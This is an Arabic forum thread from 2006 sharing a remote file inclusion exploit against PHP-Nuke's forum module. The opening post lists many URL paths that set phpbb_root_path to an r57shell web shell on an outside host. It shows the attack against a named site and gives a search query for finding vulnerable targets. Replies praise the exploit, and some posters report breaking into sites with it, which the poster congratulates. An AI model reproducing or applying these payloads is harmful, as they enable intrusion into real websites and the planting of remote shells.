المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثغرة php-nuke


AMC
31-05-2006, 10:56
السلام عليكم
هذى ثغره جديده لمجلة النيوك
وتعتمد هالثغره على المنتدى الملحق بالمجله
وحسب كلام المصدر الثغره شغاله على جميع اصدارات النيوك
والثغره تسمحلك بتحميل شيل على موقع
وطبعا ينحط الكود ورا اسم الموقع
اخليكم مع الاكواد ملوت الثغره

modules/Forums/admin/index.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?
او
modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?
او
modules/Forums/admin/admin_board.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?
او
modules/Forums/admin/admin_disallow.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?
او
modules/Forums/admin/admin_forumauth.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?
او
modules/Forums/admin/admin_groups.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?
او
modules/Forums/admin/admin_ranks.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?
او
modules/Forums/admin/admin_styles.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?
او
modules/Forums/admin/admin_user_ban.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?
او
modules/Forums/admin/admin_words.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?
او
modules/Forums/admin/admin_avatar.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?
او
modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?
بتعب وانا اقول او
modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?
او
modules/Forums/admin/admin_forums.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?
او
modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?
او
modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?
او
modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?
او
modules/Forums/admin/admin_users.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?

وهذا تطبيق على احد المواقع

http://www.zosprpwus.com.pl/modules/Forums/admin/index.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?

وقبل لا انسى لمعرفة المواقع المصابه اضغط هنا (http://www.google.com/search?q=Powered+by+PHP-Nuke++&hl=ar&lr=&start=0&sa=N)
يالله فمان الله

MeSa7eB
31-05-2006, 11:02
بطل يا Amc ..

يعطييك العافية ما تقصر ..

احترامي

alsamer
31-05-2006, 11:41
طيب ممكن تقولنا الله لا يهينك وين

نكتب اوامر الشل ؟؟

لان الشل الروسي الجديد ذا بصراحه صعب


يا ليت لو احد يعرف ينزلنا شرح



ومشكوووووووووووووووووووووووور يا عسل على الشرح+ الثغره

السنافي2
01-06-2006, 03:55
مشكوووووور اخوي ع الثغره وانا جربتها يعطييك الف عافيه

والثغره 100 % |28|

AMC
01-06-2006, 04:43
يعافيكم يارب
بالنسبه لاوامر الشل اخوى ايفل ماستر ماقصر وشرح الاوامر
وتلقاهم هنى (http://www.3asfh.net/vb/showthread.php?t=4248&highlight=%C7%E6%C7%E3%D1+%C7%E1%D4%E1)

اما بخصوص وين تكتبهم
اذا كان السيرفر شغال على السيف مود ماكو مجال انك تطبق اى امر بالشيل
اما اذا كان مطفى فيتم تطبيق الاوامر اهنى شوف الصوره التاليه

http://members.lycos.co.uk/kinglo/up/pic/todo1.gif

واتمنى يكون هذا اللى قصدته
فمان الله

فـ الحربي ـهد
02-06-2006, 02:28
شكرا يا amc ....

والله يعطيك العافيه

.....

قائد
03-06-2006, 06:45
مشكوووووووووووووور واخترقت رسيفر بالهثغره خخخخخخخ عقبال ما اخترق شركة استضافه

AMC
03-06-2006, 01:32
العفو حبايبى
ومبروك الاختراق اخوى قائد